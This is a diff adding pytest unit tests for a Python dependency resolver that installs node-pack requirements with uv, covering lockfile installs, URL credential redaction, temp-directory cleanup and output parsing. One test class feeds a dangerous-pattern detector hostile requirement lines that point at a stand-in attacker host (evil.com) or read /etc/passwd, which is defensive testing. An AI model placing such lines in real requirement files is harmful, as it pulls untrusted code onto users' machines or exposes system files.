+ lockfile = os.path.join(str(tmp_path), "resolved.txt")
+ with open(lockfile, "w") as f:
+ f.write("nonexistent-pkg==1.0.0\n")
+
+ r = _resolver([])
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 1, stdout="", stderr="No matching distribution found"
+ )):
+ result = r.install_from_lockfile(lockfile)
+
+ assert not result.success
+ assert result.stderr != ""
+
+ def test_timeout(self, tmp_path):
+ lockfile = os.path.join(str(tmp_path), "resolved.txt")
+ with open(lockfile, "w") as f:
+ f.write("numpy==1.24.0\n")
+
+ r = _resolver([])
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 600)):
+ result = r.install_from_lockfile(lockfile)
+
+ assert not result.success
+ assert "TimeoutExpired" in result.stderr
+
+ def test_atomic_failure_empty_installed(self, tmp_path):
+ lockfile = os.path.join(str(tmp_path), "resolved.txt")
+ with open(lockfile, "w") as f:
+ f.write("broken-pkg==1.0.0\n")
+
+ r = _resolver([])
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 1, stdout="", stderr="error"
+ )):
+ result = r.install_from_lockfile(lockfile)
+
+ assert not result.success
+ assert result.installed == []
+
+
+# ===========================================================================
+# Credential redaction
+# ===========================================================================
+
+class TestCredentialRedaction:
+ def test_redact_user_pass(self):
+ r = _resolver([])
+ url = "https://user:pass123@pypi.example.com/simple"
+ assert "user:pass123" not in r._redact_url(url)
+ assert "****@" in r._redact_url(url)
+
+ def test_no_credentials_passthrough(self):
+ r = _resolver([])
+ url = "https://pypi.org/simple"
+ assert r._redact_url(url) == url
+
+ def test_redact_pattern(self):
+ assert _CREDENTIAL_PATTERN.sub('://****@', "https://a:b@host") == "https://****@host"
+
+
+# ===========================================================================
+# cleanup_stale_tmp
+# ===========================================================================
+
+class TestCleanupStaleTmp:
+ def test_removes_old_dirs(self, tmp_path):
+ stale = os.path.join(str(tmp_path), f"{_TMP_PREFIX}old")
+ os.makedirs(stale)
+ # Make it appear old
+ old_time = time.time() - 7200 # 2 hours ago
+ os.utime(stale, (old_time, old_time))
+
+ with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
+ UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
+
+ assert not os.path.exists(stale)
+
+ def test_preserves_recent_dirs(self, tmp_path):
+ recent = os.path.join(str(tmp_path), f"{_TMP_PREFIX}recent")
+ os.makedirs(recent)
+
+ with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
+ UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
+
+ assert os.path.exists(recent)
+
+ def test_ignores_non_prefix_dirs(self, tmp_path):
+ other = os.path.join(str(tmp_path), "other_dir")
+ os.makedirs(other)
+ old_time = time.time() - 7200
+ os.utime(other, (old_time, old_time))
+
+ with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
+ UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
+
+ assert os.path.exists(other)
+
+
+# ===========================================================================
+# Concurrency: unique temp directories
+# ===========================================================================
+
+class TestConcurrency:
+ def test_unique_temp_directories(self):
+ """Two resolver instances get unique temp dirs (via mkdtemp)."""
+ dirs: list[str] = []
+
+ original_mkdtemp = tempfile.mkdtemp
+
+ def capturing_mkdtemp(**kwargs):
+ d = original_mkdtemp(**kwargs)
+ dirs.append(d)
+ return d
+
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy", "/p")],
+ )
+
+ def fake_run(cmd, **kwargs):
+ for i, arg in enumerate(cmd):
+ if arg == "--output-file" and i + 1 < len(cmd):
+ with open(cmd[i + 1], "w") as f:
+ f.write("numpy==1.24.0\n")
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=fake_run):
+ with mock.patch(
+ "comfyui_manager.common.unified_dep_resolver.tempfile.mkdtemp",
+ side_effect=capturing_mkdtemp,
+ ):
+ r.compile_lockfile(deps)
+ r.compile_lockfile(deps)
+
+ assert len(dirs) == 2
+ assert dirs[0] != dirs[1]
+
+ for d in dirs:
+ shutil.rmtree(d, ignore_errors=True)
+
+
+# ===========================================================================
+# resolve_and_install (full pipeline)
+# ===========================================================================
+
+class TestResolveAndInstall:
+ def test_no_deps_returns_success(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a") # No requirements.txt
+ r = _resolver([p])
+ result = r.resolve_and_install()
+ assert result.success
+
+ def test_uv_not_available_raises(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ r = _resolver([p])
+ with mock.patch.object(r, "_get_uv_cmd", side_effect=UvNotAvailableError("no uv")):
+ with pytest.raises(UvNotAvailableError):
+ r.resolve_and_install()
+
+ def test_compile_failure_returns_error(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ r = _resolver([p])
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 1, stdout="", stderr="conflict error"
+ )):
+ result = r.resolve_and_install()
+
+ assert not result.success
+ assert "compile failed" in result.error
+
+ def test_full_success_pipeline(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ r = _resolver([p])
+
+ call_count = {"compile": 0, "install": 0}
+
+ def fake_run(cmd, **kwargs):
+ cmd_str = " ".join(cmd)
+ if "compile" in cmd_str:
+ call_count["compile"] += 1
+ for i, arg in enumerate(cmd):
+ if arg == "--output-file" and i + 1 < len(cmd):
+ with open(cmd[i + 1], "w") as f:
+ f.write("numpy==1.24.0\n")
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+ elif "install" in cmd_str:
+ call_count["install"] += 1
+ return subprocess.CompletedProcess(
+ cmd, 0, stdout="Installed numpy-1.24.0\n", stderr=""
+ )
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=fake_run):
+ result = r.resolve_and_install()
+
+ assert result.success
+ assert call_count["compile"] == 1
+ assert call_count["install"] == 1
+ assert result.collected is not None
+ assert len(result.collected.requirements) == 1
+
+
+# ===========================================================================
+# Multiple custom_nodes paths
+# ===========================================================================
+
+class TestMultiplePaths:
+ def test_collection_from_multiple_paths(self, tmp_path):
+ dir_a = os.path.join(str(tmp_path), "custom_nodes_a")
+ dir_b = os.path.join(str(tmp_path), "custom_nodes_b")
+ p1 = _make_node_pack(dir_a, "pack_1", "numpy\n")
+ p2 = _make_node_pack(dir_b, "pack_2", "requests\n")
+ r = _resolver([p1, p2])
+ deps = r.collect_requirements()
+ names = {req.name for req in deps.requirements}
+ assert names == {"numpy", "requests"}
+
+
+# ===========================================================================
+# cm_global defensive access
+# ===========================================================================
+
+class TestDefensiveAccess:
+ def test_default_blacklist_is_empty_set(self):
+ r = UnifiedDepResolver(node_pack_paths=[])
+ assert r.blacklist == set()
+
+ def test_default_overrides_is_empty_dict(self):
+ r = UnifiedDepResolver(node_pack_paths=[])
+ assert r.overrides == {}
+
+ def test_default_downgrade_blacklist_is_empty_list(self):
+ r = UnifiedDepResolver(node_pack_paths=[])
+ assert r.downgrade_blacklist == []
+
+ def test_explicit_none_uses_defaults(self):
+ r = UnifiedDepResolver(
+ node_pack_paths=[],
+ blacklist=None,
+ overrides=None,
+ downgrade_blacklist=None,
+ )
+ assert r.blacklist == set()
+ assert r.overrides == {}
+ assert r.downgrade_blacklist == []
+
+
+# ===========================================================================
+# Regex patterns
+# ===========================================================================
+
+class TestPatterns:
+ def test_dangerous_pattern_matches(self):
+ assert _DANGEROUS_PATTERNS.match("-r secret.txt")
+ assert _DANGEROUS_PATTERNS.match("--requirement secret.txt")
+ assert _DANGEROUS_PATTERNS.match("-e git+https://evil.com")
+ assert _DANGEROUS_PATTERNS.match("--editable ./local")
+ assert _DANGEROUS_PATTERNS.match("-c constraints.txt")
+ assert _DANGEROUS_PATTERNS.match("--find-links http://evil.com")
+ assert _DANGEROUS_PATTERNS.match("-f http://evil.com")
+ assert _DANGEROUS_PATTERNS.match("pkg @ file:///etc/passwd")
+
+ def test_dangerous_pattern_no_false_positive(self):
+ assert _DANGEROUS_PATTERNS.match("numpy>=1.20") is None
+ assert _DANGEROUS_PATTERNS.match("requests") is None
+ assert _DANGEROUS_PATTERNS.match("torch --index-url https://x.com") is None
+
+ def test_version_spec_pattern(self):
+ m = _VERSION_SPEC_PATTERN.search("torch>=2.0")
+ assert m is not None
+ assert m.group(1) == "torch"
+ assert m.group(2) == ">="
+ assert m.group(3) == "2.0"
+
+ def test_version_spec_no_version(self):
+ m = _VERSION_SPEC_PATTERN.search("torch")
+ assert m is None
+
+
+# ===========================================================================
+# _extract_package_name
+# ===========================================================================
+
+class TestExtractPackageName:
+ def test_simple_name(self):
+ assert UnifiedDepResolver._extract_package_name("numpy") == "numpy"
+
+ def test_with_version(self):
+ assert UnifiedDepResolver._extract_package_name("numpy>=1.20") == "numpy"
+
+ def test_normalisation(self):
+ assert UnifiedDepResolver._extract_package_name("My-Package>=1.0") == "my_package"
+
+ def test_extras(self):
+ assert UnifiedDepResolver._extract_package_name("requests[security]") == "requests"
+
+ def test_at_url(self):
+ assert UnifiedDepResolver._extract_package_name("pkg @ https://example.com/pkg.tar.gz") == "pkg"
+
+
+# ===========================================================================
+# _is_disabled_path
+# ===========================================================================
+
+class TestIsDisabledPath:
+ def test_new_style(self):
+ assert UnifiedDepResolver._is_disabled_path("/custom_nodes/.disabled/my_pack")
+
+ def test_old_style(self):
+ assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled")
+
+ def test_normal_path(self):
+ assert not UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack")
+
+ def test_trailing_slash(self):
+ assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled/")
+
+
+# ===========================================================================
+# collect_node_pack_paths
+# ===========================================================================
+
+class TestCollectNodePackPaths:
+ def test_collects_subdirectories(self, tmp_path):
+ base = tmp_path / "custom_nodes"
+ base.mkdir()
+ (base / "pack_a").mkdir()
+ (base / "pack_b").mkdir()
+ (base / "file.txt").touch() # not a dir — should be excluded
+ result = collect_node_pack_paths([str(base)])
+ names = sorted(os.path.basename(p) for p in result)
+ assert names == ["pack_a", "pack_b"]
+
+ def test_nonexistent_base_dir(self):
+ result = collect_node_pack_paths(["/nonexistent/path"])
+ assert result == []
+
+ def test_multiple_base_dirs(self, tmp_path):
+ base1 = tmp_path / "cn1"
+ base2 = tmp_path / "cn2"
+ base1.mkdir()
+ base2.mkdir()
+ (base1 / "pack_a").mkdir()
+ (base2 / "pack_b").mkdir()
+ result = collect_node_pack_paths([str(base1), str(base2)])
+ names = sorted(os.path.basename(p) for p in result)
+ assert names == ["pack_a", "pack_b"]
+
+ def test_empty_base_dir(self, tmp_path):
+ base = tmp_path / "custom_nodes"
+ base.mkdir()
+ result = collect_node_pack_paths([str(base)])
+ assert result == []
+
+
+# ===========================================================================
+# collect_base_requirements
+# ===========================================================================
+
+class TestCollectBaseRequirements:
+ def test_reads_both_files(self, tmp_path):
+ (tmp_path / "requirements.txt").write_text("numpy>=1.20\n")
+ (tmp_path / "manager_requirements.txt").write_text("requests\n")
+ result = collect_base_requirements(str(tmp_path))
+ assert result == ["numpy>=1.20", "requests"]
+
+ def test_skips_comments_and_blanks(self, tmp_path):
+ (tmp_path / "requirements.txt").write_text("# comment\n\nnumpy\n \n")
+ result = collect_base_requirements(str(tmp_path))
+ assert result == ["numpy"]
+
+ def test_missing_files(self, tmp_path):
+ result = collect_base_requirements(str(tmp_path))
+ assert result == []
+
+ def test_only_requirements_txt(self, tmp_path):
+ (tmp_path / "requirements.txt").write_text("torch\n")
+ result = collect_base_requirements(str(tmp_path))
+ assert result == ["torch"]
+
+
+# ===========================================================================
+# _parse_conflicts (direct unit tests)
+# ===========================================================================
+
+class TestParseConflicts:
+ def test_extracts_conflict_lines(self):
+ stderr = (
+ "Resolved 10 packages\n"
+ "error: package torch has conflicting requirements\n"
+ " conflict between numpy>=2.0 and numpy<1.25\n"
+ "some other info\n"
+ )
+ result = UnifiedDepResolver._parse_conflicts(stderr)
+ assert len(result) == 2
+ assert "conflicting" in result[0]
+ assert "conflict" in result[1]
+
+ def test_extracts_error_lines(self):
+ stderr = "ERROR: No matching distribution found for nonexistent-pkg\n"
+ result = UnifiedDepResolver._parse_conflicts(stderr)
+ assert len(result) == 1
+ assert "nonexistent-pkg" in result[0]
+
+ def test_empty_stderr(self):
+ result = UnifiedDepResolver._parse_conflicts("")
+ assert result == []
+
+ def test_whitespace_only_stderr(self):
+ result = UnifiedDepResolver._parse_conflicts(" \n\n ")
+ assert result == []
+
+ def test_no_conflict_keywords_falls_back_to_full_stderr(self):
+ stderr = "resolution failed due to incompatible versions"
+ result = UnifiedDepResolver._parse_conflicts(stderr)
+ # No 'conflict' or 'error' keyword → falls back to [stderr.strip()]
+ assert result == [stderr.strip()]
+
+ def test_mixed_lines(self):
+ stderr = (
+ "info: checking packages\n"
+ "error: failed to resolve\n"
+ "debug: trace output\n"
+ )
+ result = UnifiedDepResolver._parse_conflicts(stderr)
+ assert len(result) == 1
+ assert "failed to resolve" in result[0]
+
+
+# ===========================================================================
+# _parse_install_output (direct unit tests)
+# ===========================================================================
+
+class TestParseInstallOutput:
+ def test_installed_packages(self):
+ result = subprocess.CompletedProcess(
+ [], 0,
+ stdout="Installed numpy-1.24.0\nInstalled requests-2.31.0\n",
+ stderr="",
+ )
+ installed, skipped = UnifiedDepResolver._parse_install_output(result)
+ assert len(installed) == 2
+ assert any("numpy" in p for p in installed)
+
+ def test_skipped_packages(self):
+ result = subprocess.CompletedProcess(
+ [], 0,
+ stdout="Requirement already satisfied: numpy==1.24.0\n",
+ stderr="",
+ )
+ installed, skipped = UnifiedDepResolver._parse_install_output(result)
+ assert len(installed) == 0
+ assert len(skipped) == 1
+ assert "already" in skipped[0].lower()
+
+ def test_mixed_installed_and_skipped(self):
+ result = subprocess.CompletedProcess(
+ [], 0,
+ stdout=(
+ "Requirement already satisfied: numpy==1.24.0\n"
+ "Installed requests-2.31.0\n"
+ "Updated torch-2.1.0\n"
+ ),
+ stderr="",
+ )
+ installed, skipped = UnifiedDepResolver._parse_install_output(result)
+ assert len(installed) == 2 # "Installed" + "Updated"
+ assert len(skipped) == 1 # "already satisfied"
+
+ def test_empty_output(self):
+ result = subprocess.CompletedProcess([], 0, stdout="", stderr="")
+ installed, skipped = UnifiedDepResolver._parse_install_output(result)
+ assert installed == []
+ assert skipped == []
+
+ def test_unrecognized_lines_ignored(self):
+ result = subprocess.CompletedProcess(
+ [], 0,
+ stdout="Resolving dependencies...\nDownloading numpy-1.24.0.whl\n",
+ stderr="",
+ )
+ installed, skipped = UnifiedDepResolver._parse_install_output(result)
+ assert installed == []
+ assert skipped == []
+
+
+# ===========================================================================
+# resolve_and_install: general Exception path
+# ===========================================================================
+
+class TestResolveAndInstallExceptionPath:
+ def test_unexpected_exception_returns_error_result(self, tmp_path):
+ """Non-UvNotAvailableError exceptions should be caught and returned."""
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ r = _resolver([p])
+
+ with mock.patch.object(
+ r, "collect_requirements",
+ side_effect=RuntimeError("unexpected disk failure"),
+ ):
+ result = r.resolve_and_install()
+
+ assert not result.success
+ assert "unexpected disk failure" in result.error
+
+ def test_unexpected_exception_during_compile(self, tmp_path):
+ """Exception in compile_lockfile should be caught by resolve_and_install."""
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ r = _resolver([p])
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch.object(
+ r, "compile_lockfile",
+ side_effect=OSError("permission denied"),
+ ):
+ result = r.resolve_and_install()
+
+ assert not result.success
+ assert "permission denied" in result.error